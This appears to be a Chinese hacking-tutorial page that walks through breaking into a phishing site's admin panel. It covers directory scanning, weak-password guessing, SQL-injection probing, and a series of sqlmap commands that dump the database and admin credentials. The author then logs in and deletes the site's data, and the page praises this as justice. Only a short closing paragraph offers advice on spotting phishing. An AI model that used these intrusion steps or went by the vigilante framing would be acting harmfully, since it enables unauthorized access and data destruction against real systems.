黑客
登录
客服
网络安全

黑客技术教程

小风教程网 >> 黑客技术教程

遇到钓鱼网站怎么办?直接教做人!

围观人数:33804 日期:2019-12-8 20:32:03

在qq上收到任何链接都有可能是钓鱼网站,比如我们收到了一个链接打开后就直接要登录qq空间,小白可能直接就输入账号密码了。但是看了一下域名不对啊,不是某讯相关的域名,显然是一个钓鱼网站。

钓鱼网站

看到危害这么大的行为,心中的正义感油然而生,怎么可以放任别人上当呢?

发给小白就算了,让我们遇到,今天算你倒霉,于是开始了正义的渗透。

第1步,扫描网站

先用工具扫描一下网站

扫描网站目录

扫描结果如上图,可以看到一个我们比较感兴趣的信息,login.php页面的返回码是200,说明该页面存在,这是一个网站管理员的后台登入页面,先打开看看再说

第2步,尝试弱口令

打开管理员后台登入页面,先尝试一下弱密码,比如admin/admin888,admin/password

很遗憾,不是弱密码,再换一种思路

第3步,尝试万能密码登入

万能密码

很遗憾,还是不能登录,再换一种思路

第4步,换思路

这个时候想起,这种登录框会不会存在SQL注入漏洞呢?要不试试看

SQL注入

这个时候我们发现找到了突破口,报错了,而且还爆出了路径

这个时候就有点兴奋了,这个时候sqlmap就派上大用场了,我们可以使用sqlmap跑包,或者通过sqlmap跑登录框,如果是跑包的话,可以使用sqlmap -r

跑登录框

使用sqlmap跑登陆框的话可以使用sqlmap -u "url" --form

python sqlmap.py -u "http://www.xxx.com/admin/login.php" –form

开始我们的sqlmap之旅

sqlmap

一段时间后,出现了我们想看到的

时间盲注

是一个POST的时间盲注,因为是盲注所以过程会比较久一点

第5步,继续利用以上得到的线索

接下来我们利用这个注入点查询当前用户和是否存在跨库查询的可能;

python sqlmap.py -u "http://www.xxx.com/admin/login.php" --form --is-dba

存在跨库查询

存在跨库查询的可能,可以看出当前的用户为xxx@localhost

第6步,接下来一次查询当前数据库;

pythonsqlmap.py -u"http://www.xxx.com/admin/login.php"--form --time-sec10--current-db

查询当前数据库

查询数据库中表名;

python sqlmap.py -u "http://www.xxx.com/admin/login.php" --form --time-sec 10 -D xxx --tables

获得后台管理用户的账号密码

我们看到最感兴趣的东西,可以获得后台管理用户的账号密码,这样就可以登录网站后台了

接下来我们查询admin表中列名;

python sqlmap.py -u "http://www.xxx.com/admin/login.php" --form --time-sec 10 -D xxx -T xxx_admin –columns

查询admin表中列名

接下来是激动人心的时刻,现在我们查询表中的数据;

查询表数据

第7步,直接登录

登录成功

数据

看了一眼后台的数据信息,还是有很多人上当受骗的,我们也帮助受害者把这些非法数据给彻底删除了。


平时生活中,这种钓鱼网站无处不在,大家需要学会如何辨认,避免上当受骗,不要贪图小便宜,一般这种网站都是送皮肤,送点券什么的,不要轻易相信,当然我们更不能去搭建这种网站,要做一个优秀的社会主义接班人。

最新文章

热门文章

黑客技术 黑客软件 黑客教程 黑客书籍

关于我们 | 免责声明 | 学员守则 | 广告服务 | 联系我们

©2013-2020 xf1433.com 版权所有

本站资源仅供用于学习和交流,请遵循相关法律法规